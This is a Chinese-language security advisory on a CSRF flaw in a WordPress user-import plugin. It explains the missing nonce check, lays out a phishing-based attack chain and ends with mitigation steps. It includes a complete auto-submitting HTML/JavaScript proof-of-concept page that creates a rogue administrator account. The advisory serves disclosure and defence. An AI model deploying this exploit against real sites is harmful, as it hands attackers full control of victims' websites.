CVE-2025-12879 WordPress User Generator插件CSRF漏洞导致管理员账户创建

漏洞信息

漏洞编号

CVE-2025-12879

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress User Generator and Importer插件

漏洞概述

CVE-2025-12879是WordPress User Generator and Importer插件中的一个高危跨站请求伪造（CSRF）漏洞。该插件专门用于批量导入和生成WordPress用户账户。漏洞存在于插件的"Import Using CSV File"（使用CSV文件导入）功能中，由于缺少适当的nonce令牌验证机制，攻击者可以构造恶意请求诱骗已登录的管理员执行非预期的操作。在成功利用此漏洞后，未认证攻击者能够创建具有管理员权限的任意用户账户，从而完全控制受影响的WordPress站点。此漏洞的CVSS评分为8.8，属于高危级别，攻击复杂度低，无需特殊权限，但需要用户交互（管理员点击链接）。由于该插件被广泛应用于需要批量管理用户账户的WordPress网站，此漏洞可能影响大量使用该插件的网站。

技术细节

该漏洞的根本原因在于WordPress插件的CSRF保护机制不完善。在WordPress安全最佳实践中，涉及状态变更的操作（如创建、修改或删除用户）必须使用wp_verify_nonce()或类似函数验证请求的合法性。然而，User Generator and Importer插件在处理CSV文件导入请求时，遗漏了对nonce的验证步骤。具体来说，漏洞出现在user-generator.php文件的第145行附近，当管理员通过插件界面上传包含用户信息的CSV文件时，服务器端未检查请求中是否包含有效的安全令牌。攻击者可以构造一个恶意HTML页面，包含自动提交的表单或JavaScript代码，诱使已登录的管理员浏览器向目标WordPress站点发送创建管理员账户的请求。由于浏览器会自动携带目标域的Cookie信息，服务器会认为这是一个合法的管理员请求，从而执行账户创建操作。攻击者只需在CSV文件中指定新账户的角色为administrator，即可获得完整的站点管理权限。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标网站是否使用User Generator and Importer插件，并确定插件版本是否在1.2.2或更早版本。攻击者通过查看页面源代码或插件目录文件确认漏洞存在。

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含恶意表单的HTML页面，该表单会自动向目标WordPress站点的用户导入功能发送POST请求。表单数据包含一个特制的CSV文件，其中包含管理员账户信息。

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、恶意链接、即时消息或其他社会工程手段，诱使目标网站的管理员访问恶意页面或点击包含恶意代码的链接。

STEP 4

步骤4：自动执行攻击

当管理员的浏览器加载恶意页面时，JavaScript代码会自动提交表单。由于浏览器会自动携带目标域的认证Cookie，WordPress服务器会认为这是一个合法的管理员请求。

STEP 5

步骤5：账户创建

服务器处理CSV文件导入请求，由于缺少nonce验证，请求被接受。插件解析CSV文件内容，创建一个具有administrator角色的新用户账户。

STEP 6

步骤6：获得控制权

攻击者使用创建的账户凭据登录WordPress后台，获得完整的管理员权限，可以安装恶意插件、修改网站内容、窃取数据或进一步渗透服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>CSRF Exploit - CVE-2025-12879</title> </head> <body> <h1>WordPress User Generator CSRF Exploit</h1> <p>Click the button below to create an admin account on the target site.</p> <form id="exploitForm" action="http://target-site.com/wp-admin/admin.php" method="POST" enctype="multipart/form-data">  <input type="hidden" name="page" value="user-import-and-generator"> <input type="hidden" name="action" value="import_users">  <input type="hidden" name="import_file" id="csvFile">  <textarea id="csvData" style="display:none;"> username,email,role,password malicious_admin,[email protected],administrator,EvilPass123! </textarea> <button type="submit" id="exploitBtn">Execute Exploit</button> </form> <script> // Convert CSV data to blob for file upload function base64ToBlob(base64, mimeType) { const byteCharacters = atob(base64); const byteNumbers = new Array(byteCharacters.length); for (let i = 0; i < byteCharacters.length; i++) { byteNumbers[i] = byteCharacters.charCodeAt(i); } const byteArray = new Uint8Array(byteNumbers); return new Blob([byteArray], {type: mimeType}); } document.getElementById('exploitForm').addEventListener('submit', function(e) { e.preventDefault(); const csvContent = document.getElementById('csvData').textContent.trim(); const csvBlob = new Blob([csvContent], {type: 'text/csv'}); const dataTransfer = new DataTransfer(); const file = new File([csvBlob], 'users.csv', {type: 'text/csv'}); dataTransfer.items.add(file); const fileInput = document.getElementById('csvFile'); fileInput.files = dataTransfer.files; // Auto-submit after setting file this.submit(); }); // Auto-execute on page load window.onload = function() { setTimeout(function() { document.getElementById('exploitBtn').click(); }, 1000); }; </script> </body> </html>

影响范围

User Generator and Importer plugin <= 1.2.2

防御指南

临时缓解措施

在等待官方补丁发布期间，可以采取以下临时缓解措施：首先，立即禁用或删除User Generator and Importer插件，如果必须使用该插件，应限制管理员账户数量并监控异常账户创建行为；其次，可以通过.htaccess或WAF规则限制CSV文件导入功能的访问，仅允许受信任的IP地址使用该功能；第三，定期检查WordPress用户列表，删除任何未经授权创建的管理员账户；第四，启用WordPress的双因素认证功能，即使账户被恶意创建也能增加攻击者登录的难度；最后，考虑使用安全监控服务实时检测异常的用户创建活动。